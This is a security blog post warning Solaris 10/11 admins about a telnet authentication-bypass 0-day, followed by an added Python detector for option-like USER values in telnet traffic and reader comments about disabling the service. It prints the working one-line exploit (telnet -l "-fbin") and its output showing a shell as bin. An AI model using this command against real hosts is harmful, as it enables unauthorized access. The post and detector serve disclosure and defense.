One more reason not to run telnet or Solaris 0-day == Trouble
We've all heard it before: don't run telnet because it's a plain-text protocol and an inherent security risk. That's true; SSH just makes more sense, and plenty of people are using SSH these days. That doesn't mean everyone is, though, so...

**ATTENTION SOLARIS ADMINS** If you're still running telnet on Solaris 10 or 11 (SunOS 5.10 or 5.11), turn it off. An email was released on Full Disclosure earlier with a new 0-day for Solaris 10/11 that's so easy it makes my skin crawl. This pdf was linked in the email, which gives details and a small shell script to perform the exploit. It seemed surprising that this existed and had not been previously found, so of course I had to try it out.
C:\Documents and Settings\treguly>telnet -l "-fbin" X.X.X.X
Last login: Sun Feb 11 00:24:44 from XXXX
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
The result is more than a little frightening...
A Hat Tip for this goes to Maynor and the Errata Security Blog for informing me of this issue.
[UPDATE] While it was initially rumoured that this didn't affect the root account, this is not the case... root logins are possible... it is dependent on configuration. More info on the nCircle Blog.
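For anyone who has to find this in network traffic rather than just switch the service off: the following is an added detection example, not code from the original post or the Full Disclosure email. It assumes the client sends the `-l` login name as the `USER` variable in a NEW-ENVIRON subnegotiation (RFC 1572), as standard telnet clients do, and flags any `USER` value beginning with `-`; all function names and the sample bytes are constructed for illustration.

```python
# Added example (not from the original post); constants per RFC 854 / RFC 1572.
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39
IS, INFO, VAR, VALUE, ESC, USERVAR = 0, 2, 0, 1, 2, 3

def subnegotiations(stream):
    """Yield (option, payload) for each complete IAC SB ... IAC SE block."""
    i, n = 0, len(stream)
    while i < n - 2:
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] == SB:
            option, payload, j = stream[i + 2], bytearray(), i + 3
            while j < n - 1:
                if stream[j] == IAC and stream[j + 1] == SE:
                    yield option, bytes(payload)
                    break
                # IAC IAC inside a subnegotiation is one literal 0xFF byte
                j += 1 if stream[j] == IAC and stream[j + 1] == IAC else 0
                payload.append(stream[j])
                j += 1
            i = j + 2
        else:  # WILL/WONT/DO/DONT (251-254) carry an option byte
            i += 3 if 251 <= stream[i + 1] <= 254 else 2

def environ_vars(payload):
    """Parse a NEW-ENVIRON IS/INFO payload into {name: value}."""
    pairs, buf, k = [], None, 1
    if not payload or payload[0] not in (IS, INFO):
        return {}
    while k < len(payload):
        b = payload[k]
        if b in (VAR, USERVAR):              # new variable: collect its name
            pairs.append((bytearray(), bytearray()))
            buf = pairs[-1][0]
        elif b == VALUE and pairs:           # switch to that variable's value
            buf = pairs[-1][1]
        elif buf is not None:
            if b == ESC and k + 1 < len(payload):
                k += 1                       # ESC: next byte is literal data
            buf.append(payload[k])
        k += 1
    return {n.decode("latin-1"): v.decode("latin-1") for n, v in pairs}

def option_like_users(stream):
    """USER values starting with '-', which login(1) would read as options."""
    envs = (environ_vars(p) for o, p in subnegotiations(stream) if o == NEW_ENVIRON)
    return [e["USER"] for e in envs if e.get("USER", "").startswith("-")]

def login_bytes(user):  # constructed: IAC WILL 39, IAC SB 39 IS VAR USER VALUE <user> IAC SE
    return b"\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01" + user.encode() + b"\xff\xf0"
```

Feed `option_like_users` the client-to-server bytes of a reassembled TCP session on port 23; a non-empty result is worth an alert regardless of the server's patch level.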
hi there,
I have a SunOS 5.10 box at my work. I'm a real newbie in SunOS so I really need your help … can you please tell me how to close telnet or if there is a patch for this vuln.
thx
You can disable telnet with the command: svcadm disable telnet
There was an interim patch available from Sun, but when I pull the page up now it seems to be gone. Perhaps they’ve issued a full patch, but I’m not sure where it is located.
Thx a lot. If you find the patch pls paste the link here, thanks.
COIS# svcadm disable telnet
svcadm: not found
COIS#